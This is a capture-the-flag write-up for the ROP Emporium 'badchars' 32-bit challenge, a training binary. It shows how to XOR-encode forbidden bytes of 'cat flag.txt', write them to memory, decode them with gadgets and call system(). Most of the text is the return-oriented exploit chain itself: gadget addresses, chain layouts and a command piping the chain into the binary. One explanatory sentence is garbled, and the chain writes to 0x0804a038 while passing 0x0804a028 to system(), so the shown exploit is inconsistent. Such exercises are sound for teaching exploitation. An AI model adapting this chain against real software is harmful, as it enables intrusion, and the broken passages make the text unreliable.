badchars
========

Get the 32-bit `badchars` binary from the
[URL on ropemporium.com](https://ropemporium.com/binary/badchars32.zip):

    curl -O https://ropemporium.com/binary/badchars32.zip
    unzip badchars32.zip

This challenge is similar to `write4`, except that having certain characters in
our payload will cause the program to terminate prematurely. The bytes we can't
use are the following:

    b i c / <space> f n s

We'll use the same technique to write `cat flag.txt` to memory, but with a few
bits flipped to avoid the checks. After the string is in place, we'll use an
`xor` gadget to change it to what we need, before calling `system()`.

As before, our chain for writing to memory looks like this:

    08048899    // pop esi; pop edi; ret
    2c74616f    // "oat,", which is "cat " ^ "0x0c00000c"
    0804a038    // address to write to (start of .data)
    08048893    // mov dword [edi], esi; ret

The only difference is that we'every occurrence of a forbidden byte with has
benn xor'ed with `0x0c`. That means we'll need to xor each forbidden byte with
`0x0c` again once they're in place. Looking around, we find these two gadgets:

    0x08048896      5b             pop ebx
    0x08048897      59             pop ecx
    0x08048898      c3             ret

    0x08048890      300b           xor byte [ebx], cl
    0x08048892      c3             ret

We can use these to xor a given byte with `0x0c` as follows:

    08048896    // pop ebx; pop ecx; ret
    0804a038    // address of the byte to xor
    0c0c0c0c    // 1-byte constant to xor with
    08048890    // xor byte [ebx], cl; ret

All we need to do now is call system as before:

    08048430    // system@plt
    ddccbbaa    // junk
    0804a028    // "cat flag.txt"

The chain is in `chain.hex`. We can use it like this:

    $ xxd -r -p chain.hex | xxd -e | xxd -r | ./badchars32
